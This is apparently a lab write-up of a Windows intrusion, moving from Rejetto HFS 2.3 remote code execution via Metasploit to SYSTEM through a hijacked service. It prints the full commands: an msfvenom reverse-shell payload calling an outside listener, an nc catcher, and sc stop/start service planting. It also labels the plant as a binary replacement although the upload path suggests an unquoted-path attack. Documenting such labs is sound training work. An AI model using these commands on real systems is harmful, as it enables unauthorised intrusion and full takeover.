Case file

Rejetto HFS RCE and Windows service binary hijack

Windows Server assessment: Rejetto HFS 2.3 (CVE-2014-6287) via Metasploit as bill; PowerUp identified a restartable LocalSystem service with a writable binary path; msfvenom service EXE replacement yielded SYSTEM.

Foundations26 minWindows · CVE · Metasploit · Privilege Escalation
  • IIS and HFS 2.3 on 8080. Metasploit CVE-2014-6287 produced Meterpreter as bill. AdvancedSystemCareService9 was LocalSystem, restartable, and writable by bill — classic service binary plant to SYSTEM.

  • nmap identified IIS, SMB, RDP, and HFS 2.3 on 8080.

  • Metasploit module against HFS 8080 returned Meterpreter as bill.

  • Invoke-AllChecks highlighted AdvancedSystemCareService9. We planted Advanced.exe, restarted the service, and caught SYSTEM on 4443.

01

Engagement summary

IIS and HFS 2.3 on 8080. Metasploit CVE-2014-6287 produced Meterpreter as bill. AdvancedSystemCareService9 was LocalSystem, restartable, and writable by bill — classic service binary plant to SYSTEM.

STEELMOUNTAIN (10.10.193.112) exposed Microsoft IIS 8.5 and HttpFileServer 2.3. We exploited CVE-2014-6287 with Metasploit for a Meterpreter session as bill. PowerUp flagged AdvancedSystemCareService9: LocalSystem, CanRestart true, binary path writable by STEELMOUNTAIN\bill. Replacing the service EXE with an msfvenom reverse shell and restarting the service elevated to SYSTEM.

Business impact

Unpatched HFS is remote code execution. Writable service binaries under Program Files are a direct privilege escalation path for any local user who can stop/start the service.

02

Windows service discovery

nmap identified IIS, SMB, RDP, and HFS 2.3 on 8080.

OPERATOR · NMAP

savvy@lab:~$ nmap 10.10.193.112 -sV -sC -Pn

PORT STATE SERVICE VERSION

80/tcp open http Microsoft IIS httpd 8.5

445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012

3389/tcp open ssl/ms-wbt-server?

8080/tcp open http HttpFileServer httpd 2.3

|_http-server-header: HFS 2.3

NetBIOS name: STEELMOUNTAIN

03

Initial access — CVE-2014-6287

Metasploit module against HFS 8080 returned Meterpreter as bill.

OPERATOR · MSF

savvy@lab:~$ msfconsole -q

msf6 > search CVE-2014-6287

msf6 > use exploit/windows/http/rejetto_hfs_rce_cve_2014_6287

msf6 exploit(…) > set RHOSTS 10.10.193.112

msf6 exploit(…) > set RPORT 8080

msf6 exploit(…) > set LHOST OPERATOR_IP

msf6 exploit(…) > exploit

meterpreter > getuid

Server username: STEELMOUNTAIN\bill

04

PowerUp and service binary hijack

Invoke-AllChecks highlighted AdvancedSystemCareService9. We planted Advanced.exe, restarted the service, and caught SYSTEM on 4443.

POWERSHELL

PowerUp.ps1

. .\PowerUp.ps1
Invoke-Allchecks
# ServiceName : AdvancedSystemCareService9
# Path        : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
# StartName   : LocalSystem
# CanRestart  : True
# ModifiableFileIdentityReference : STEELMOUNTAIN\bill

OPERATOR · MSFVENOM

savvy@lab:~$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.86.191 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe

OPERATOR · SERVICE REPLACE

meterpreter > shell

C:\> sc stop AdvancedSystemCareService9

meterpreter > upload Advanced.exe "\Program Files (x86)\IObit\Advanced SystemCare\Advanced.exe"

savvy@lab:~$ nc -lvnp 4443

C:\> sc start AdvancedSystemCareService9

… reverse shell as SYSTEM …

Remediation

Remove or patch HFS 2.3, restrict write ACLs on service binaries, and run third-party services as least-privilege accounts — not LocalSystem — when possible.